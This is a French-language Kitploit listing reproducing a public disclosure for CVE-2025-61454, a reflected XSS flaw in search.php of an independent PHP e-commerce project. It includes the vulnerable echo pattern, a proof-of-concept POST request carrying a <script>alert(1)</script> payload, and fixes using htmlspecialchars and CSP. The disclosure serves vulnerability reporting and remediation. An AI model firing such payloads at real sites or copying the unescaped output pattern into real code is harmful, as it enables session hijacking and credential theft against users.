Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-61454 — Divulgation publique et preuve de concept pour CVE-2025-61454, une vulnérabilité XSS réfléchie dans search.php du projet E-commerce v1.0, incluant les étapes d'exploitation et les recommandations de remédiation. | Kitploit
Outils/GitHubGitHub/tansique-17/cve-2025-61454
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebArticles et RechercheApprentissage et Éducation
GitHubtansique-17/cve-2025-61454

CVE-2025-61454

Divulgation publique et preuve de concept pour CVE-2025-61454, une vulnérabilité XSS réfléchie dans search.php du projet E-commerce v1.0, incluant les étapes d'exploitation et les recommandations de remédiation.

Voir le dépôt
il y a 10 moisPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ Divulgation CVE : CVE-2025-61454 — XSS réfléchi dans un projet e-commerce

Date de divulgation : 14 octobre 2025
Identifiant CVE : CVE-2025-61454
Gravité : MOYENNE (CVSS 6.1)


🧩 Résumé

Une vulnérabilité de Cross-Site Scripting (XSS) réfléchi existe dans le E-commerce Project v1.0, plus précisément dans le point de terminaison search.php. L'entrée non assainie du paramètre search est directement reflétée dans le HTML de la réponse, permettant aux attaquants d'exécuter du JavaScript arbitraire dans le navigateur d'un utilisateur qui visite un lien malveillant ou soumet une requête spécialement conçue.

Ce problème a été identifié sous la référence CVE-2025-61454. Au moment de la divulgation, aucun correctif n'a été publié par le fournisseur.


📦 Produit concerné

  • Fournisseur : Indépendant (Bhabishya-123)
  • Projet : E-commerce
  • Version : v1.0
  • Fichier : search.php
  • Point de terminaison vulnérable :
    http://localhost/e-commerce-main/search.php

  • 🔬 Détails de la vulnérabilité

    Le serveur ne parvient pas à assainir correctement le paramètre search des données POST avant de le refléter dans le HTML de la réponse. Cela permet aux attaquants d'injecter des charges utiles JavaScript, conduisant à une exécution de code côté client.

    Un attaquant conçoit une entrée contenant du contenu de type script intégré et l'envoie au point de terminaison POST vulnérable. Étant donné que le serveur reflète l'entrée dans la réponse HTML sans appliquer un encodage HTML/attribut/JS approprié, le navigateur traite le contenu reflété comme du balisage exécutable et l'exécute. Il s'agit d'un scénario XSS réfléchi (non persistant) ; l'attaquant doit convaincre une victime d'effectuer la requête ou de visiter un lien/formulaire spécialement conçu.

    Modèle de code vulnérable (hypothétique) :

    root@kitploit:~
    $search = $_POST['search'];
    echo "<div>Résultats de recherche pour : $search</div>";
    

    📌 Classification CWE

    ID CWETitre
    CWE-79Neutralisation incorrecte de l'entrée lors de la génération de pages Web ('Cross-site Scripting')

    📊 Score CVSS v3.1

    ScoreGravitéChaîne vectorielle
    6.1MOYENNECVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

    💥 Impact

    Une exploitation réussie pourrait entraîner :

    • 🧠 Exécution de JavaScript arbitraire
    • 🎭 Hameçonnage ou usurpation d'identité via injection HTML
    • 🍪 Détournement de session ou vol de jetons
    • 🚨 Redirection forcée ou distribution de logiciels malveillants
    • 🎣 Collecte d'identifiants via de faux formulaires de connexion
    • 📊 Défiguration de la page de résultats de recherche

    🧪 Preuve de concept (PoC)

    1. Cloner le dépôt

    root@kitploit:~
    git clone https://github.com/Bhabishya-123/E-commerce.git
    

    2. Héberger localement

    Utilisez XAMPP/LAMP pour déployer le projet et accéder à l'application.

    3. Exploiter la vulnérabilité

    📥 Exemple de requête

    root@kitploit:~
    POST /e-commerce-main/search.php HTTP/1.1
    Host: localhost
    Referer: https://localhost/e-commerce-main/
    Content-Type: application/x-www-form-urlencoded
    
    search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=
    

    📋 Charge utile décodée

    root@kitploit:~
    search=yxo9p<script>alert(1)</script>xnzmd&submit=
    

    📋 Charge utile injectée

    root@kitploit:~
    yxo9p<script>alert(1)</script>xnzmd
    

    Explication :
    La charge utile <script>alert(1)</script> est intégrée dans le paramètre search. Lorsqu'une victime soumet un formulaire de recherche avec cette charge utile malveillante (ou est trompée pour le faire via ingénierie sociale), le JavaScript s'exécute dans le contexte de son navigateur.

    4. Résultat attendu

    Si la vulnérabilité est présente, le navigateur exécutera le code JavaScript, affichant une boîte d'alerte avec la valeur 1. Cela confirme une exploitation XSS réussie.


    🔐 Recommandations

    • ✅ Utilisez htmlspecialchars() ou équivalent pour encoder toutes les sorties non fiables avant de les rendre en HTML.
    • 🧰 Implémentez une validation d'entrée côté serveur pour toutes les entrées de formulaire, en particulier le paramètre de recherche.
    • 🧱 Définissez des en-têtes Content Security Policy (CSP) stricts pour empêcher l'exécution de scripts en ligne.
    • 🚫 Évitez d'intégrer directement des entrées utilisateur non assainies dans les réponses HTML.
    • 🔒 Implémentez un encodage de sortie approprié selon le contexte (HTML, JavaScript, URL, CSS).
    • 🛡️ Utilisez des frameworks modernes offrant une protection XSS automatique.

    ✅ Exemple de correctif

    root@kitploit:~
    $search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
    echo "<div>Résultats de recherche pour : $search</div>";
    

    🛡️ Exemple de Content Security Policy

    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    

    📆 Chronologie

    ÉvénementDate
    Vulnérabilité découverte16 septembre 2025
    Divulgation publique13 octobre 2025
    Correctif disponible❌ Non disponible au moment de la divulgation

    🙋‍♂️ Crédits

    Cette vulnérabilité a été découverte et divulguée par :

    Tansique Dasari
    🔗 GitHub
    ✉️ [email protected]


    🔗 Références

    • OWASP - XSS
    • CWE-79 - Classification XSS
    • PortSwigger - Cross-site Scripting
    • CVE-2025-61454 sur CVE.org

    💬 Cet avis est publié de manière indépendante en raison de l'absence de correctif officiel du fournisseur.

    Télécharger l’outil